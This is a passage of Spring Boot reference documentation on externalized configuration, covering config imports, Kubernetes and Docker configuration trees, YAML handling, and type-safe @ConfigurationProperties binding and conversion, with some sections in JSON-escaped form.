\"value\"\n----\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t property: \"value\"\n\tspring:\n\t config:\n\t import: \"my.properties\"\n----\n\nIn both of the above examples, the values from the `my.properties` file will take precedence over the file that triggered its import.\n\nSeveral locations can be specified under a single `spring.config.import` key.\nLocations will be processed in the order that they are defined, with later imports taking precedence.\n\nNOTE: When appropriate, <<features#features.external-config.files.profile-specific, Profile-specific variants>> are also considered for import.\nThe example above would import both `my.properties` as well as any `my-<profile>.properties` variants.\n\n[TIP]\n====\nSpring Boot includes pluggable API that allows various different location addresses to be supported.\nBy default you can import Java Properties, YAML and \"`<<features#features.external-config.files.configtree, configuration trees>>`\".\n\nThird-party jars can offer support for additional technologies (there is no requirement for files to be local).\nFor example, you can imagine config data being from external stores such as Consul, Apache ZooKeeper or Netflix Archaius.\n\nIf you want to support your own locations, see the `ConfigDataLocationResolver` and `ConfigDataLoader` classes in the `org.springframework.boot.context.config` package.\n====\n\n\n\n[[features.external-config.files.importing-extensionless]]\n==== Importing Extensionless Files\nSome cloud platforms cannot add a file extension to volume mounted files.\nTo import these extensionless files, you need to give Spring Boot a hint so that it knows how to load them.\nYou can do this by 
NOTE: When appropriate, <<features#features.external-config.files.profile-specific, Profile-specific variants>> are also considered for import.
The example above would import both `my.properties` as well as any `my-<profile>.properties` variants.

[TIP]
====
Spring Boot includes a pluggable API that allows various different location addresses to be supported.
By default you can import Java Properties, YAML and "`<<features#features.external-config.files.configtree, configuration trees>>`".

Third-party jars can offer support for additional technologies (there is no requirement for files to be local).
For example, you can imagine config data coming from external stores such as Consul, Apache ZooKeeper or Netflix Archaius.

If you want to support your own locations, see the `ConfigDataLocationResolver` and `ConfigDataLoader` classes in the `org.springframework.boot.context.config` package.
====


[[features.external-config.files.importing-extensionless]]
==== Importing Extensionless Files
Some cloud platforms cannot add a file extension to volume mounted files.
To import these extensionless files, you need to give Spring Boot a hint so that it knows how to load them.
You can do this by putting an extension hint in square brackets.

For example, suppose you have a `/etc/config/myconfig` file that you wish to import as yaml.
You can import it from your `application.properties` using the following:

[source,yaml,indent=0,subs="verbatim",configprops,configblocks]
----
spring:
  config:
    import: "file:/etc/config/myconfig[.yaml]"
----


[[features.external-config.files.configtree]]
==== Using Configuration Trees
When running applications on a cloud platform (such as Kubernetes) you often need to read config values that the platform supplies.
It is not uncommon to use environment variables for such purposes, but this can have drawbacks, especially if the value is supposed to be kept secret.

As an alternative to environment variables, many cloud platforms now allow you to map configuration into mounted data volumes.
For example, Kubernetes can volume mount both https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/#populate-a-volume-with-data-stored-in-a-configmap[`ConfigMaps`] and https://kubernetes.io/docs/concepts/configuration/secret/#using-secrets-as-files-from-a-pod[`Secrets`].

There are two common volume mount patterns that can be used:

. A single file contains a complete set of properties (usually written as YAML).
. Multiple files are written to a directory tree, with the filename becoming the '`key`' and the contents becoming the '`value`'.

For the first case, you can import the YAML or Properties file directly using `spring.config.import` as described <<features#features.external-config.files.importing,above>>.
For the second case, you need to use the `configtree:` prefix so that Spring Boot knows it needs to expose all the files as properties.

As an example, let's imagine that Kubernetes has mounted the following volume:

[indent=0]
----
etc/
  config/
    myapp/
      username
      password
----

The contents of the `username` file would be a config value, and the contents of `password` would be a secret.

To import these properties, you can add the following to your `application.properties` or `application.yaml` file:

[source,yaml,indent=0,subs="verbatim",configprops,configblocks]
----
spring:
  config:
    import: "optional:configtree:/etc/config/"
----

You can then access or inject `myapp.username` and `myapp.password` properties from the `Environment` in the usual way.
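For instance, the two values could be injected into a bean.
A minimal sketch (the class and field names are illustrative, not part of the documentation above):

[source,java,indent=0,subs="verbatim"]
----
import org.springframework.beans.factory.annotation.Value;
import org.springframework.stereotype.Component;

@Component
public class MyAppCredentials {

    private final String username;

    private final String password;

    // both values come from the imported config tree
    public MyAppCredentials(@Value("${myapp.username}") String username,
            @Value("${myapp.password}") String password) {
        this.username = username;
        this.password = password;
    }

}
----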
TIP: The folders under the config tree form the property name.
In the above example, to access the properties as `username` and `password`, you can set `spring.config.import` to `optional:configtree:/etc/config/myapp`.

NOTE: Filenames with dot notation are also correctly mapped.
For example, in the above example, a file named `myapp.username` in `/etc/config` would result in a `myapp.username` property in the `Environment`.

TIP: Configuration tree values can be bound to both `String` and `byte[]` types depending on the contents expected.

If you have multiple config trees to import from the same parent folder you can use a wildcard shortcut.
Any `configtree:` location that ends with `/*/` will import all immediate children as config trees.

For example, given the following volume:

[indent=0]
----
etc/
  config/
    dbconfig/
      db/
        username
        password
    mqconfig/
      mq/
        username
        password
----

You can use `configtree:/etc/config/*/` as the import location:

[source,yaml,indent=0,subs="verbatim",configprops,configblocks]
----
spring:
  config:
    import: "optional:configtree:/etc/config/*/"
----

This will add `db.username`, `db.password`, `mq.username` and `mq.password` properties.

NOTE: Directories loaded using a wildcard are sorted alphabetically.
If you need a different order, then you should list each location as a separate import.

Configuration trees can also be used for Docker secrets.
When a Docker swarm service is granted access to a secret, the secret gets mounted into the container.
For example, if a secret named `db.password` is mounted at location `/run/secrets/`, you can make `db.password` available to the Spring environment using the following:

[source,yaml,indent=0,subs="verbatim",configprops,configblocks]
----
spring:
  config:
    import: "optional:configtree:/run/secrets/"
----
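As a rough sketch of the Docker side (the secret value, service name and image are placeholders), the secret might be created and granted like this:

[source,shell,indent=0,subs="verbatim"]
----
# create the secret, then grant the swarm service access to it
$ echo "secret-password" | docker secret create db.password -
$ docker service create --name myapp --secret db.password myapp-image:latest
----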
[[features.external-config.files.property-placeholders]]
==== Property Placeholders
The values in `application.properties` and `application.yml` are filtered through the existing `Environment` when they are used, so you can refer back to previously defined values (for example, from System properties or environment variables).
The standard `$\{name}` property-placeholder syntax can be used anywhere within a value.
Property placeholders can also specify a default value using a `:` to separate the default value from the property name, for example `$\{name:default}`.

The use of placeholders with and without defaults is shown in the following example:

[source,yaml,indent=0,subs="verbatim",configblocks]
----
app:
  name: "MyApp"
  description: "${app.name} is a Spring Boot application written by ${username:Unknown}"
----

Assuming that the `username` property has not been set elsewhere, `app.description` will have the value `MyApp is a Spring Boot application written by Unknown`.

TIP: You can also use this technique to create "`short`" variants of existing Spring Boot properties.
See the _<<howto#howto.properties-and-configuration.short-command-line-arguments>>_ how-to for details.


[[features.external-config.files.multi-document]]
==== Working with Multi-Document Files
Spring Boot allows you to split a single physical file into multiple logical documents which are each added independently.
Documents are processed in order, from top to bottom.
Later documents can override the properties defined in earlier ones.

For `application.yml` files, the standard YAML multi-document syntax is used.
Three consecutive hyphens represent the end of one document, and the start of the next.

For example, the following file has two logical documents:

[source,yaml,indent=0,subs="verbatim"]
----
spring:
  application:
    name: "MyApp"
---
spring:
  application:
    name: "MyCloudApp"
  config:
    activate:
      on-cloud-platform: "kubernetes"
----

For `application.properties` files a special `#---` comment is used to mark the document splits:

[source,properties,indent=0,subs="verbatim"]
----
spring.application.name=MyApp
#---
spring.application.name=MyCloudApp
spring.config.activate.on-cloud-platform=kubernetes
----

NOTE: Property file separators must not have any leading whitespace and must have exactly three hyphen characters.
The lines immediately before and after the separator must not be comments.

TIP: Multi-document property files are often used in conjunction with activation properties such as `spring.config.activate.on-profile`.
See the <<features#features.external-config.files.activation-properties, next section>> for details.

WARNING: Multi-document property files cannot be loaded by using the `@PropertySource` or `@TestPropertySource` annotations.


[[features.external-config.files.activation-properties]]
==== Activation Properties
It is sometimes useful to only activate a given set of properties when certain conditions are met.
For example, you might have properties that are only relevant when a specific profile is active.

You can conditionally activate a properties document using `spring.config.activate.*`.

The following activation properties are available:

.activation properties
[cols="1,4"]
|===
| Property | Note

| `on-profile`
| A profile expression that must match for the document to be active.

| `on-cloud-platform`
| The `CloudPlatform` that must be detected for the document to be active.
|===

For example, the following specifies that the second document is only active when running on Kubernetes, and only when either the "`prod`" or "`staging`" profiles are active:

[source,yaml,indent=0,subs="verbatim",configblocks]
----
myprop: "always-set"
---
spring:
  config:
    activate:
      on-cloud-platform: "kubernetes"
      on-profile: "prod | staging"
myotherprop: "sometimes-set"
----


[[features.external-config.encrypting]]
=== Encrypting Properties
Spring Boot does not provide any built-in support for encrypting property values; however, it does provide the hook points necessary to modify values contained in the Spring `Environment`.
The `EnvironmentPostProcessor` interface allows you to manipulate the `Environment` before the application starts.
See <<howto#howto.application.customize-the-environment-or-application-context>> for details.

If you need a secure way to store credentials and passwords, the https://cloud.spring.io/spring-cloud-vault/[Spring Cloud Vault] project provides support for storing externalized configuration in https://www.vaultproject.io/[HashiCorp Vault].
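As a rough illustration of that hook point, the following sketch replaces an encrypted property with its decrypted value.
The `my.secret` property name and the `decrypt` helper are hypothetical, and the class would also need to be registered under the `org.springframework.boot.env.EnvironmentPostProcessor` key in `META-INF/spring.factories`:

[source,java,indent=0,subs="verbatim"]
----
import java.util.Map;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.env.EnvironmentPostProcessor;
import org.springframework.core.env.ConfigurableEnvironment;
import org.springframework.core.env.MapPropertySource;

public class DecryptingEnvironmentPostProcessor implements EnvironmentPostProcessor {

    @Override
    public void postProcessEnvironment(ConfigurableEnvironment environment, SpringApplication application) {
        String encrypted = environment.getProperty("my.secret");
        if (encrypted != null) {
            // shadow the encrypted value with a higher-priority property source
            Map<String, Object> decrypted = Map.of("my.secret", decrypt(encrypted));
            environment.getPropertySources().addFirst(new MapPropertySource("decrypted", decrypted));
        }
    }

    private String decrypt(String value) {
        return value; // placeholder: replace with real decryption
    }

}
----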
[[features.external-config.yaml]]
=== Working with YAML
https://yaml.org[YAML] is a superset of JSON and, as such, is a convenient format for specifying hierarchical configuration data.
The `SpringApplication` class automatically supports YAML as an alternative to properties whenever you have the https://bitbucket.org/asomov/snakeyaml[SnakeYAML] library on your classpath.

NOTE: If you use "`Starters`", SnakeYAML is automatically provided by `spring-boot-starter`.


[[features.external-config.yaml.mapping-to-properties]]
==== Mapping YAML to Properties
YAML documents need to be converted from their hierarchical format to a flat structure that can be used with the Spring `Environment`.
For example, consider the following YAML document:

[source,yaml,indent=0,subs="verbatim"]
----
environments:
  dev:
    url: "https://dev.example.com"
    name: "Developer Setup"
  prod:
    url: "https://another.example.com"
    name: "My Cool App"
----

In order to access these properties from the `Environment`, they would be flattened as follows:

[source,properties,indent=0,subs="verbatim"]
----
environments.dev.url=https://dev.example.com
environments.dev.name=Developer Setup
environments.prod.url=https://another.example.com
environments.prod.name=My Cool App
----

Likewise, YAML lists also need to be flattened.
They are represented as property keys with `[index]` dereferencers.
For example, consider the following YAML:

[source,yaml,indent=0,subs="verbatim"]
----
my:
  servers:
    - "dev.example.com"
    - "another.example.com"
----

The preceding example would be transformed into these properties:

[source,properties,indent=0,subs="verbatim"]
----
my.servers[0]=dev.example.com
my.servers[1]=another.example.com
----

TIP: Properties that use the `[index]` notation can be bound to Java `List` or `Set` objects using Spring Boot's `Binder` class.
For more details see the "`<<features#features.external-config.typesafe-configuration-properties>>`" section below.

WARNING: YAML files cannot be loaded by using the `@PropertySource` or `@TestPropertySource` annotations.
So, in the case that you need to load values that way, you need to use a properties file.


[[features.external-config.yaml.directly-loading]]
==== Directly Loading YAML
Spring Framework provides two convenient classes that can be used to load YAML documents.
The `YamlPropertiesFactoryBean` loads YAML as `Properties` and the `YamlMapFactoryBean` loads YAML as a `Map`.

You can also use the `YamlPropertySourceLoader` class if you want to load YAML as a Spring `PropertySource`.
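For example, loading a YAML document as `Properties` might look like the following sketch (the resource name is illustrative):

[source,java,indent=0,subs="verbatim"]
----
import java.util.Properties;

import org.springframework.beans.factory.config.YamlPropertiesFactoryBean;
import org.springframework.core.io.ClassPathResource;

public class YamlLoadingExample {

    public static void main(String[] args) {
        YamlPropertiesFactoryBean factory = new YamlPropertiesFactoryBean();
        factory.setResources(new ClassPathResource("application.yml"));
        // the YAML hierarchy is flattened into dotted keys, as described above
        Properties properties = factory.getObject();
        System.out.println(properties);
    }

}
----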
[[features.external-config.random-values]]
=== Configuring Random Values
The `RandomValuePropertySource` is useful for injecting random values (for example, into secrets or test cases).
It can produce integers, longs, uuids, or strings, as shown in the following example:

[source,yaml,indent=0,subs="verbatim",configblocks]
----
my:
  secret: "${random.value}"
  number: "${random.int}"
  bignumber: "${random.long}"
  uuid: "${random.uuid}"
  number-less-than-ten: "${random.int(10)}"
  number-in-range: "${random.int[1024,65536]}"
----

The `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any character and `value,max` are integers.
If `max` is provided, then `value` is the minimum value and `max` is the maximum value (exclusive).


[[features.external-config.system-environment]]
=== Configuring System Environment Properties
Spring Boot supports setting a prefix for environment properties.
This is useful if the system environment is shared by multiple Spring Boot applications with different configuration requirements.
The prefix for system environment properties can be set directly on `SpringApplication`.

For example, if you set the prefix to `input`, a property such as `remote.timeout` will also be resolved as `input.remote.timeout` in the system environment.


[[features.external-config.typesafe-configuration-properties]]
=== Type-safe Configuration Properties
Using the `@Value("$\{property}")` annotation to inject configuration properties can sometimes be cumbersome, especially if you are working with multiple properties or your data is hierarchical in nature.
Spring Boot provides an alternative method of working with properties that lets strongly typed beans govern and validate the configuration of your application.

TIP: See also the <<features#features.external-config.typesafe-configuration-properties.vs-value-annotation,differences between `@Value` and type-safe configuration properties>>.


[[features.external-config.typesafe-configuration-properties.java-bean-binding]]
==== JavaBean properties binding
It is possible to bind a bean declaring standard JavaBean properties as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/javabeanbinding/MyProperties.java[]
----

The preceding POJO defines the following properties:

* `my.service.enabled`, with a value of `false` by default.
* `my.service.remote-address`, with a type that can be coerced from `String`.
* `my.service.security.username`, with a nested "security" object whose name is determined by the name of the property.
  In particular, the type is not used at all there and could have been `SecurityProperties`.
* `my.service.security.password`.
* `my.service.security.roles`, with a collection of `String` that defaults to `USER`.

NOTE: The properties that map to `@ConfigurationProperties` classes available in Spring Boot, which are configured through properties files, YAML files, environment variables, and other mechanisms, are public API but the accessors (getters/setters) of the class itself are not meant to be used directly.

[NOTE]
====
Such an arrangement relies on a default empty constructor, and getters and setters are usually mandatory, since binding is through standard Java Beans property descriptors, just like in Spring MVC.
A setter may be omitted in the following cases:

* Maps, as long as they are initialized, need a getter but not necessarily a setter, since they can be mutated by the binder.
* Collections and arrays can be accessed either through an index (typically with YAML) or by using a single comma-separated value (properties).
  In the latter case, a setter is mandatory.
  We recommend always adding a setter for such types.
  If you initialize a collection, make sure it is not immutable (as in the preceding example).
* If nested POJO properties are initialized (like the `Security` field in the preceding example), a setter is not required.
  If you want the binder to create the instance on the fly by using its default constructor, you need a setter.

Some people use Project Lombok to add getters and setters automatically.
Make sure that Lombok does not generate any particular constructor for such a type, as it is used automatically by the container to instantiate the object.

Finally, only standard Java Bean properties are considered and binding on static properties is not supported.
====
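To illustrate the map rule from the note above, the following sketch (with hypothetical names) exposes a mutable `Map` through a getter only; the binder can still populate it:

[source,java,indent=0,subs="verbatim"]
----
import java.util.HashMap;
import java.util.Map;

import org.springframework.boot.context.properties.ConfigurationProperties;

@ConfigurationProperties("my.endpoints")
public class EndpointProperties {

    // initialized and mutable, so no setter is needed for binding
    private final Map<String, String> urls = new HashMap<>();

    public Map<String, String> getUrls() {
        return this.urls;
    }

}
----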
[[features.external-config.typesafe-configuration-properties.constructor-binding]]
==== Constructor binding
The example in the previous section can be rewritten in an immutable fashion as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/constructorbinding/MyProperties.java[]
----

In this setup, the `@ConstructorBinding` annotation is used to indicate that constructor binding should be used.
This means that the binder will expect to find a constructor with the parameters that you wish to have bound.
If you are using Java 16 or later, constructor binding can be used with records.
In this case, unless your record has multiple constructors, there is no need to use `@ConstructorBinding`.

Nested members of a `@ConstructorBinding` class (such as `Security` in the example above) will also be bound through their constructor.

Default values can be specified using `@DefaultValue` on a constructor parameter or, when using Java 16 or later, a record component.
The conversion service will be applied to coerce the `String` value to the target type of a missing property.

Referring to the previous example, if no properties are bound to `Security`, the `MyProperties` instance will contain a `null` value for `security`.
If you wish to return a non-null instance of `Security` even when no properties are bound to it, you can use an empty `@DefaultValue` annotation to do so:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/constructorbinding/nonnull/MyProperties.java[tag=*]
----

NOTE: To use constructor binding the class must be enabled using `@EnableConfigurationProperties` or configuration property scanning.
You cannot use constructor binding with beans that are created by the regular Spring mechanisms (for example `@Component` beans, beans created by using `@Bean` methods or beans loaded by using `@Import`).

TIP: If you have more than one constructor for your class you can also use `@ConstructorBinding` directly on the constructor that should be bound.

NOTE: The use of `java.util.Optional` with `@ConfigurationProperties` is not recommended as it is primarily intended for use as a return type.
As such, it is not well-suited to configuration property injection.
For consistency with properties of other types, if you do declare an `Optional` property and it has no value, `null` rather than an empty `Optional` will be bound.
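For the record-based variant mentioned above, a minimal sketch (the names are illustrative) might look like this; no `@ConstructorBinding` is needed because the record has a single constructor:

[source,java,indent=0,subs="verbatim"]
----
import java.util.List;

import org.springframework.boot.context.properties.ConfigurationProperties;
import org.springframework.boot.context.properties.bind.DefaultValue;

@ConfigurationProperties("my.service")
public record MyServiceProperties(
        boolean enabled,
        @DefaultValue("USER") List<String> roles) {
}
----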
[[features.external-config.typesafe-configuration-properties.enabling-annotated-types]]
==== Enabling @ConfigurationProperties-annotated types
Spring Boot provides infrastructure to bind `@ConfigurationProperties` types and register them as beans.
You can either enable configuration properties on a class-by-class basis or enable configuration property scanning that works in a similar manner to component scanning.

Sometimes, classes annotated with `@ConfigurationProperties` might not be suitable for scanning, for example, if you're developing your own auto-configuration or you want to enable them conditionally.
In these cases, specify the list of types to process using the `@EnableConfigurationProperties` annotation.
This can be done on any `@Configuration` class, as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/enablingannotatedtypes/MyConfiguration.java[]
----

To use configuration property scanning, add the `@ConfigurationPropertiesScan` annotation to your application.
Typically, it is added to the main application class that is annotated with `@SpringBootApplication` but it can be added to any `@Configuration` class.
By default, scanning will occur from the package of the class that declares the annotation.
If you want to define specific packages to scan, you can do so as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/enablingannotatedtypes/MyApplication.java[]
----

[NOTE]
====
When the `@ConfigurationProperties` bean is registered using configuration property scanning or through `@EnableConfigurationProperties`, the bean has a conventional name: `<prefix>-<fqn>`, where `<prefix>` is the environment key prefix specified in the `@ConfigurationProperties` annotation and `<fqn>` is the fully qualified name of the bean.
If the annotation does not provide any prefix, only the fully qualified name of the bean is used.

The bean name in the example above is `com.example.app-com.example.app.SomeProperties`.
====

We recommend that `@ConfigurationProperties` only deal with the environment and, in particular, do not inject other beans from the context.
For corner cases, setter injection can be used or any of the `*Aware` interfaces provided by the framework (such as `EnvironmentAware` if you need access to the `Environment`).
If you still want to inject other beans using the constructor, the configuration properties bean must be annotated with `@Component` and use JavaBean-based property binding.


[[features.external-config.typesafe-configuration-properties.using-annotated-types]]
==== Using @ConfigurationProperties-annotated types
This style of configuration works particularly well with the `SpringApplication` external YAML configuration, as shown in the following example:

[source,yaml,indent=0,subs="verbatim"]
----
my:
  service:
    remote-address: 192.168.1.1
    security:
      username: "admin"
      roles:
        - "USER"
        - "ADMIN"
----

To work with `@ConfigurationProperties` beans, you can inject them in the same way as any other bean, as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/usingannotatedtypes/MyService.java[]
----

TIP: Using `@ConfigurationProperties` also lets you generate metadata files that can be used by IDEs to offer auto-completion for your own keys.
See the <<configuration-metadata#appendix.configuration-metadata,appendix>> for details.


[[features.external-config.typesafe-configuration-properties.third-party-configuration]]
==== Third-party Configuration
As well as using `@ConfigurationProperties` to annotate a class, you can also use it on public `@Bean` methods.
Doing so can be particularly useful when you want to bind properties to third-party components that are outside of your control.

To configure a bean from the `Environment` properties, add `@ConfigurationProperties` to its bean registration, as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/thirdpartyconfiguration/ThirdPartyConfiguration.java[]
----

Any JavaBean property defined with the `another` prefix is mapped onto that `AnotherComponent` bean in a manner similar to the preceding `SomeProperties` example.
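The included listing is not reproduced here; under the assumptions in the surrounding text (with `AnotherComponent` standing in for the third-party class), the registration presumably resembles the following sketch:

[source,java,indent=0,subs="verbatim"]
----
import org.springframework.boot.context.properties.ConfigurationProperties;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;

@Configuration(proxyBeanMethods = false)
public class ThirdPartyConfiguration {

    @Bean
    @ConfigurationProperties(prefix = "another")
    public AnotherComponent anotherComponent() {
        // JavaBean properties such as another.* are bound onto the returned bean
        return new AnotherComponent();
    }

}
----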
[[features.external-config.typesafe-configuration-properties.relaxed-binding]]
==== Relaxed Binding
Spring Boot uses some relaxed rules for binding `Environment` properties to `@ConfigurationProperties` beans, so there does not need to be an exact match between the `Environment` property name and the bean property name.
Common examples where this is useful include dash-separated environment properties (for example, `context-path` binds to `contextPath`), and capitalized environment properties (for example, `PORT` binds to `port`).

As an example, consider the following `@ConfigurationProperties` class:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/relaxedbinding/MyPersonProperties.java[]
----

With the preceding code, the following property names can all be used:

.relaxed binding
[cols="1,4"]
|===
| Property | Note

| `my.main-project.person.first-name`
| Kebab case, which is recommended for use in `.properties` and `.yml` files.

| `my.main-project.person.firstName`
| Standard camel case syntax.

| `my.main-project.person.first_name`
| Underscore notation, which is an alternative format for use in `.properties` and `.yml` files.

| `MY_MAINPROJECT_PERSON_FIRSTNAME`
| Upper case format, which is recommended when using system environment variables.
|===

NOTE: The `prefix` value for the annotation _must_ be in kebab case (lowercase and separated by `-`, such as `my.main-project.person`).

.relaxed binding rules per property source
[cols="2,4,4"]
|===
| Property Source | Simple | List

| Properties Files
| Camel case, kebab case, or underscore notation
| Standard list syntax using `[ ]` or comma-separated values

| YAML Files
| Camel case, kebab case, or underscore notation
| Standard YAML list syntax or comma-separated values

| Environment Variables
| Upper case format with underscore as the delimiter (see <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>>).
| Numeric values surrounded by underscores (see <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>>)

| System properties
| Camel case, kebab case, or underscore notation
| Standard list syntax using `[ ]` or comma-separated values
|===

TIP: We recommend that, when possible, properties are stored in lower-case kebab format, such as `my.person.first-name=Rod`.


[[features.external-config.typesafe-configuration-properties.relaxed-binding.maps]]
===== Binding Maps
When binding to `Map` properties you may need to use a special bracket notation so that the original `key` value is preserved.
If the key is not surrounded by `[]`, any characters that are not alpha-numeric, `-` or `.` are removed.

For example, consider binding the following properties to a `Map<String,String>`:

[source,properties,indent=0,subs="verbatim",role="primary"]
.Properties
----
my.map.[/key1]=value1
my.map.[/key2]=value2
my.map./key3=value3
----

[source,yaml,indent=0,subs="verbatim",role="secondary"]
.Yaml
----
my:
  map:
    "[/key1]": "value1"
    "[/key2]": "value2"
    "/key3": "value3"
----

NOTE: For YAML files, the brackets need to be surrounded by quotes for the keys to be parsed properly.

The properties above will bind to a `Map` with `/key1`, `/key2` and `key3` as the keys in the map.
The slash has been removed from `key3` because it was not surrounded by square brackets.

When binding to scalar values, keys with `.` in them do not need to be surrounded by `[]`.
Scalar values include enums and all types in the `java.lang` package except for `Object`.
Binding `a.b=c` to `Map<String, String>` will preserve the `.` in the key and return a Map with the entry `{"a.b"="c"}`.
For any other types you need to use the bracket notation if your `key` contains a `.`.
For example, binding `a.b=c` to `Map<String, Object>` will return a Map with the entry `{"a"={"b"="c"}}` whereas `[a.b]=c` will return a Map with the entry `{"a.b"="c"}`.
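The `Binder` mentioned earlier can also bind such maps programmatically.
A minimal sketch, assuming the `my.map` entries shown above are present in the `Environment`:

[source,java,indent=0,subs="verbatim"]
----
import java.util.Map;

import org.springframework.boot.context.properties.bind.Bindable;
import org.springframework.boot.context.properties.bind.Binder;
import org.springframework.core.env.Environment;

public class MapBindingExample {

    Map<String, String> bind(Environment environment) {
        // keys such as /key1 and /key2 keep their original bracketed form
        return Binder.get(environment)
                .bind("my.map", Bindable.mapOf(String.class, String.class))
                .orElseGet(Map::of);
    }

}
----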
[[features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables]]
===== Binding from Environment Variables
Most operating systems impose strict rules around the names that can be used for environment variables.
For example, Linux shell variables can contain only letters (`a` to `z` or `A` to `Z`), numbers (`0` to `9`) or the underscore character (`_`).
By convention, Unix shell variables will also have their names in UPPERCASE.

Spring Boot's relaxed binding rules are, as much as possible, designed to be compatible with these naming restrictions.

To convert a property name in its canonical form to an environment variable name you can follow these rules:

* Replace dots (`.`) with underscores (`_`).
* Remove any dashes (`-`).
* Convert to uppercase.

For example, the configuration property `spring.main.log-startup-info` would be an environment variable named `SPRING_MAIN_LOGSTARTUPINFO`.

Environment variables can also be used when binding to object lists.
To bind to a `List`, the element number should be surrounded with underscores in the variable name.

For example, the configuration property `my.service[0].other` would use an environment variable named `MY_SERVICE_0_OTHER`.
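Putting the two rules together, the application could be launched with both values supplied entirely through the environment, as in this sketch (assuming a packaged `myapp.jar`):

[source,shell,indent=0,subs="verbatim"]
----
# binds to spring.main.log-startup-info and my.service[0].other
$ SPRING_MAIN_LOGSTARTUPINFO=false MY_SERVICE_0_OTHER=value java -jar myapp.jar
----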
on-profile: \"dev\"\n\tmy:\n\t map:\n\t key1:\n\t name: \"dev name 1\"\n\t key2:\n\t name: \"dev name 2\"\n\t description: \"dev description 2\"\n----\n\nIf the `dev` profile is not active, `MyProperties.map` contains one entry with key `key1` (with a name of `my name 1` and a description of `my description 1`).\nIf the `dev` profile is enabled, however, `map` contains two entries with keys `key1` (with a name of `dev name 1` and a description of `my description 1`) and `key2` (with a name of `dev name 2` and a description of `dev description 2`).\n\nNOTE: The preceding merging rules apply to properties from all property sources, and not just files.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion]]\n==== Properties Conversion\nSpring Boot attempts to coerce the external application properties to the right type when it binds to the `@ConfigurationProperties` beans.\nIf you need custom type conversion, you can provide a `ConversionService` bean (with a bean named `conversionService`) or custom property editors (through a `CustomEditorConfigurer` bean) or custom `Converters` (with bean definitions annotated as `@ConfigurationPropertiesBinding`).\n\nNOTE: As this bean is requested very early during the application lifecycle, make sure to limit the dependencies that your `ConversionService` is using.\nTypically, any dependency that you require may not be fully initialized at creation time.\nYou may want to rename your custom `ConversionService` if it is not required for configuration keys coercion and only rely on custom converters qualified with `@ConfigurationPropertiesBinding`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.durations]]\n===== Converting Durations\nSpring Boot has dedicated support for expressing durations.\nIf you expose a `java.time.Duration` property, the following formats in application properties are available:\n\n* A regular `long` representation (using milliseconds as the default unit unless a `@DurationUnit` has been specified)\n* The standard ISO-8601 format {java-api}\/java\/time\/Duration.html#parse-java.lang.CharSequence-[used by `java.time.Duration`]\n* A more readable format where the value and the unit are coupled (`10s` means 10 seconds)\n\nConsider the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/durations\/javabeanbinding\/MyProperties.java[]\n----\n\nTo specify a session timeout of 30 seconds, `30`, `PT30S` and `30s` are all equivalent.\nA read timeout of 500ms can be specified in any of the following form: `500`, `PT0.5S` and `500ms`.\n\nYou can also use any of the supported units.\nThese are:\n\n* `ns` for nanoseconds\n* `us` for microseconds\n* `ms` for milliseconds\n* `s` for seconds\n* `m` for minutes\n* `h` for hours\n* `d` for days\n\nThe default unit is milliseconds and can be overridden using `@DurationUnit` as illustrated in the sample above.\n\nIf you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/durations\/constructorbinding\/MyProperties.java[]\n----\n\n\nTIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DurationUnit`) if it is not milliseconds.\nDoing so gives a transparent upgrade path while supporting a much richer 
[[features.external-config.typesafe-configuration-properties.conversion.durations]]
===== Converting Durations
Spring Boot has dedicated support for expressing durations.
If you expose a `java.time.Duration` property, the following formats in application properties are available:

* A regular `long` representation (using milliseconds as the default unit unless a `@DurationUnit` has been specified)
* The standard ISO-8601 format {java-api}/java/time/Duration.html#parse-java.lang.CharSequence-[used by `java.time.Duration`]
* A more readable format where the value and the unit are coupled (`10s` means 10 seconds)

Consider the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/conversion/durations/javabeanbinding/MyProperties.java[]
----

To specify a session timeout of 30 seconds, `30`, `PT30S` and `30s` are all equivalent.
A read timeout of 500ms can be specified in any of the following forms: `500`, `PT0.5S` and `500ms`.

You can also use any of the supported units.
These are:

* `ns` for nanoseconds
* `us` for microseconds
* `ms` for milliseconds
* `s` for seconds
* `m` for minutes
* `h` for hours
* `d` for days

The default unit is milliseconds and can be overridden using `@DurationUnit` as illustrated in the sample above.

If you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:

[source,java,indent=0,subs="verbatim"]
----
include::{docs-java}/features/externalconfig/typesafeconfigurationproperties/conversion/durations/constructorbinding/MyProperties.java[]
----

TIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DurationUnit`) if it is not milliseconds.
Doing so gives a transparent upgrade path while supporting a much richer format.


